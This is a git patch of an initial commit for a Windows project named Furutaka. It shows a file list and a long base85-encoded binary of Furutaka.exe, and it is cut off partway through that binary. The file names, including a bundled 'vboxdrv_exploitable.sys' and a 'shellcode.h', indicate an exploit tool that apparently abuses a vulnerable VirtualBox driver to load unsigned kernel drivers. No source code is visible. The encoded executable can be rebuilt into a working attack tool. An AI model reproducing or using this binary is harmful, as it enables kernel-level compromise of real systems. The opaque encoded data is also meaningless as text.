From 20a4e9b2102a5978673178303fb3babf9790626d Mon Sep 17 00:00:00 2001 
From: hfiref0x Date: Thu, 4 Feb 2016 11:42:05 +0700 Subject: [PATCH] v 1.0.0 Initial commit --- Compiled/Furutaka.exe | Bin 0 -> 97792 bytes Compiled/dummy.sys | Bin 0 -> 2560 bytes Compiled/dummy2.sys | Bin 0 -> 4096 bytes README.md | 40 + Source/DummyDrv/dummy.sln | 20 + Source/DummyDrv/dummy/dummy.vcxproj | 239 + Source/DummyDrv/dummy/dummy.vcxproj.filters | 26 + Source/DummyDrv/dummy/dummy.vcxproj.user | 6 + Source/DummyDrv/dummy/main.c | 63 + Source/DummyDrv2/dummy.sln | 20 + Source/DummyDrv2/dummy/dummy.vcxproj | 242 + Source/DummyDrv2/dummy/dummy.vcxproj.filters | 31 + Source/DummyDrv2/dummy/dummy.vcxproj.user | 6 + Source/DummyDrv2/dummy/main.c | 296 ++ Source/DummyDrv2/dummy/main.h | 112 + Source/DummyDrv2/dummy/r3request.c | 34 + Source/Furutaka/Furutaka.sln | 22 + Source/Furutaka/Furutaka.vcxproj | 217 + Source/Furutaka/Furutaka.vcxproj.filters | 110 + Source/Furutaka/Furutaka.vcxproj.user | 19 + Source/Furutaka/cui.c | 64 + Source/Furutaka/cui.h | 28 + Source/Furutaka/drv/vboxdrv_exploitable.sys | Bin 0 -> 68288 bytes Source/Furutaka/global.h | 50 + Source/Furutaka/instdrv.c | 265 + Source/Furutaka/instdrv.h | 54 + Source/Furutaka/main.c | 838 +++ Source/Furutaka/minirtl/_strcat.c | 37 + Source/Furutaka/minirtl/_strcmpi.c | 47 + Source/Furutaka/minirtl/_strcpy.c | 43 + Source/Furutaka/minirtl/_strend.c | 23 + Source/Furutaka/minirtl/_strlen.c | 27 + Source/Furutaka/minirtl/_strncmpi.c | 55 + Source/Furutaka/minirtl/cmdline.c | 180 + Source/Furutaka/minirtl/cmdline.h | 35 + Source/Furutaka/minirtl/minirtl.h | 155 + Source/Furutaka/minirtl/rtltypes.h | 43 + Source/Furutaka/minirtl/u64tohex.c | 49 + Source/Furutaka/minirtl/u64tostr.c | 45 + Source/Furutaka/minirtl/ultohex.c | 49 + Source/Furutaka/minirtl/ultostr.c | 45 + Source/Furutaka/ntos.h | 4904 ++++++++++++++++++ Source/Furutaka/resource.h | Bin 0 -> 900 bytes Source/Furutaka/resource.rc | Bin 0 -> 4978 bytes Source/Furutaka/shellcode.h | 145 + Source/Furutaka/sup.c | 422 ++ Source/Furutaka/sup.h | 
59 + Source/Furutaka/vbox.h | 226 + TDL.sha256 | 47 + 49 files changed, 9438 insertions(+) create mode 100644 Compiled/Furutaka.exe create mode 100644 Compiled/dummy.sys create mode 100644 Compiled/dummy2.sys create mode 100644 README.md create mode 100644 Source/DummyDrv/dummy.sln create mode 100644 Source/DummyDrv/dummy/dummy.vcxproj create mode 100644 Source/DummyDrv/dummy/dummy.vcxproj.filters create mode 100644 Source/DummyDrv/dummy/dummy.vcxproj.user create mode 100644 Source/DummyDrv/dummy/main.c create mode 100644 Source/DummyDrv2/dummy.sln create mode 100644 Source/DummyDrv2/dummy/dummy.vcxproj create mode 100644 Source/DummyDrv2/dummy/dummy.vcxproj.filters create mode 100644 Source/DummyDrv2/dummy/dummy.vcxproj.user create mode 100644 Source/DummyDrv2/dummy/main.c create mode 100644 Source/DummyDrv2/dummy/main.h create mode 100644 Source/DummyDrv2/dummy/r3request.c create mode 100644 Source/Furutaka/Furutaka.sln create mode 100644 Source/Furutaka/Furutaka.vcxproj create mode 100644 Source/Furutaka/Furutaka.vcxproj.filters create mode 100644 Source/Furutaka/Furutaka.vcxproj.user create mode 100644 Source/Furutaka/cui.c create mode 100644 Source/Furutaka/cui.h create mode 100644 Source/Furutaka/drv/vboxdrv_exploitable.sys create mode 100644 Source/Furutaka/global.h create mode 100644 Source/Furutaka/instdrv.c create mode 100644 Source/Furutaka/instdrv.h create mode 100644 Source/Furutaka/main.c create mode 100644 Source/Furutaka/minirtl/_strcat.c create mode 100644 Source/Furutaka/minirtl/_strcmpi.c create mode 100644 Source/Furutaka/minirtl/_strcpy.c create mode 100644 Source/Furutaka/minirtl/_strend.c create mode 100644 Source/Furutaka/minirtl/_strlen.c create mode 100644 Source/Furutaka/minirtl/_strncmpi.c create mode 100644 Source/Furutaka/minirtl/cmdline.c create mode 100644 Source/Furutaka/minirtl/cmdline.h create mode 100644 Source/Furutaka/minirtl/minirtl.h create mode 100644 Source/Furutaka/minirtl/rtltypes.h create mode 100644 
Source/Furutaka/minirtl/u64tohex.c create mode 100644 Source/Furutaka/minirtl/u64tostr.c create mode 100644 Source/Furutaka/minirtl/ultohex.c create mode 100644 Source/Furutaka/minirtl/ultostr.c create mode 100644 Source/Furutaka/ntos.h create mode 100644 Source/Furutaka/resource.h create mode 100644 Source/Furutaka/resource.rc create mode 100644 Source/Furutaka/shellcode.h create mode 100644 Source/Furutaka/sup.c create mode 100644 Source/Furutaka/sup.h create mode 100644 Source/Furutaka/vbox.h create mode 100644 TDL.sha256 
diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe new file mode 100644 index 0000000000000000000000000000000000000000..0c6dfa369f1f6602475a2c4984fb0a6527581328 GIT binary patch literal 97792 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 